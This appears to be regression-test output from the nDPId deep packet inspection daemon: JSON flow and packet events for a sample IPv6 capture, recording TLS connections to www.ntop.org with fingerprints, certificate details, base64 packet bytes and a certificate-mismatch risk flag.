00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":98,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269138575,"flow_last_seen":1448269138628,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1448269138628,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}}
01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":104,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1448269138575,"flow_last_seen":1448269138635,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":4964,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1448269138635,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"shop.ntop.org,www.shop.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=shop.ntop.org","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"FB:A6:FF:A7:58:F3:9D:54:24:45:E5:A0:C4:04:18:D5:58:91:E0:34"}}
01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1448269138575,"flow_last_seen":1448269138636,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2668,"flow_tot_l4_payload_len":4964,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1448269138636,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"shop.ntop.org,www.shop.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=shop.ntop.org","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"FB:A6:FF:A7:58:F3:9D:54:24:45:E5:A0:C4:04:18:D5:58:91:E0:34"}}
00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":120,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269139219,"flow_last_seen":1448269139219,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1448269139219,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1448269139219,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269139219,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACgGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABknYBuw4c9NoAAAAAoAJwgGsaAAACBAWgBAIIChINd8gAAAAAAQMDBw=="}
00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1448269139239,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269139239,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACgGNyoDsMAAAwDQAAAAAABwEAEqAA1AAAEAA3qswP\/+pw1MAbuSdnTlL8YOHPTboBJvkPn2AAACBAWgBAIICgBerYcSDXfIAQMDCA=="}
00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1448269139239,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269139239,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABknYBuw4c9Nt05S\/HgBAA4WsSAAABAQgKEg13zQBerYc="}
00887{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269139219,"flow_last_seen":1448269139239,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1448269139239,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}}
00944{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":125,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269139219,"flow_last_seen":1448269139263,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1448269139263,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}}
01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":131,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1448269139219,"flow_last_seen":1448269139267,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":4964,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1448269139267,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"shop.ntop.org,www.shop.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=shop.ntop.org","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"FB:A6:FF:A7:58:F3:9D:54:24:45:E5:A0:C4:04:18:D5:58:91:E0:34"}}
00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":135,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269139314,"flow_last_seen":1448269139314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269139314,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:1a1::eed","src_port":60124,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1448269139314,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269139314,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqAibwAK0BoQAAAAAAAA7t6twBuwxnksLpg7gmgBABC+E3AAABAQgKEg134BvnLVo="}
00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1448269139321,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269139321,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACAGOyoCJvAArQGhAAAAAAAADu0qAA1AAAEAA3qswP\/+pw1MAbvq3OmDuCYMZ5LDgBAD0zk\/AAABAQgKG+fdWhINH94="}
00621{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":140,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269143410,"flow_last_seen":1448269143410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269143410,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:2880:1010:3f20:face:b00c::25de","src_port":40308,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1448269143410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269143410,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqAyiAEBA\/IPrOsAwAACXenXQBu97bCAR6JAzggBADIfF3AAABAQgKEg174HFvpAM="}
00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1448269143539,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269143539,"pkt":"eKzApw1M9LUv\/K\/Cht1gwAAAACAGKyoDKIAQED8g+s6wDAAAJd4qAA1AAAEAA3qswP\/+pw1MAbuddHokDODe2wgFgBAAa0\/sAAABAQgKcXBUrRINT9U="}
00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":142,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269144306,"flow_last_seen":1448269144306,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269144306,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:400b:c02::9a","src_port":33062,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1448269144306,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269144306,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqABRQQAsMAgAAAAAAAACagSYBu7SkSa3RTHVvgBABRwoCAAABAQgKEg18wD9sNbI="}
00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":143,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1448269144348,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269144348,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACAGNSoAFFBACwwCAAAAAAAAAJoqAA1AAAEAA3qswP\/+pw1MAbuBJtFMdW+0pEmugBABd0eeAAABAQgKP2zlshINJLA="}
00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":144,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269144450,"flow_last_seen":1448269144450,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1448269144450,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1448269144450,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269144450,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACgGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABkoIBuwefNhUAAAAAoAJwgGsaAAACBAWgBAIIChINfOQAAAAAAQMDBw=="}
00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":145,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1448269144475,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269144475,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACgGNyoDsMAAAwDQAAAAAABwEAEqAA1AAAEAA3qswP\/+pw1MAbuSgnjE+S8HnzYWoBJvkOerAAACBAWgBAIICgBesqQSDXzkAQMDCA=="}
00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1448269144475,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269144475,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABkoIBuwefNhZ4xPkwgBAA4WsSAAABAQgKEg186gBesqQ="}
00888{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":147,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269144450,"flow_last_seen":1448269144475,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1448269144475,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}}
00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":149,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269144450,"flow_last_seen":1448269144502,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1448269144502,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}}
01398{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":155,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1448269144450,"flow_last_seen":1448269144508,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":4964,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1448269144508,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"shop.ntop.org,www.shop.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=shop.ntop.org","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"FB:A6:FF:A7:58:F3:9D:54:24:45:E5:A0:C4:04:18:D5:58:91:E0:34"}}
00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":170,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269145458,"flow_last_seen":1448269145458,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269145458,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1012","src_port":59690,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":170,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1448269145458,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269145458,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqABRQQAEIAwAAAAAAABAS6SoBu3aemNPcvXclgBAA6hVxAAABAQgKEg194OPdWG4="}
00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1448269145478,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269145478,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACAGOSoAFFBAAQgDAAAAAAAAEBIqAA1AAAEAA3qswP\/+pw1MAbvpKty9dyV2npjUgBAA8BoIAAABAQgK494IbhIM+eU="}
00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":172,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269146905,"flow_last_seen":1448269146905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1448269146905,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1448269146905,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269146905,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACgGQCoADUAAAQADeqzA\/\/6nDUwqAibwAK0BlwAAAAAAAAI2z4wBuwtKuykAAAAAoAJwgNR+AAACBAWgBAIIChINf0kAAAAAAQMDBw=="}
00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":173,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269146905,"flow_last_seen":1448269146905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1448269146905,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1448269146905,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269146905,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACgGQCoADUAAAQADeqzA\/\/6nDUwqAibwAK0BlwAAAAAAAAI2z44Bu8SPrfMAAAAAoAJwgNR+AAACBAWgBAIIChINf0kAAAAAAQMDBw=="}
00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":174,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1448269146912,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269146912,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACgGOyoCJvAArQGXAAAAAAAAAjYqAA1AAAEAA3qswP\/+pw1MAbvPjun6mTbEj630oBJswJfaAAACBAV8BAIIChvn+wESDX9JAQMDBQ=="}
00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1448269146912,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269146912,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqAibwAK0BlwAAAAAAAAI2z44Bu8SPrfTp+pk3gBAA4dR2AAABAQgKEg1\/Sxvn+wE="}
00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1448269146912,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269146912,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACgGOyoCJvAArQGXAAAAAAAAAjYqAA1AAAEAA3qswP\/+pw1MAbvPjOjBmT8LSrsqoBJswEUcAAACBAV8BAIIChvn+wESDX9JAQMDBQ=="}
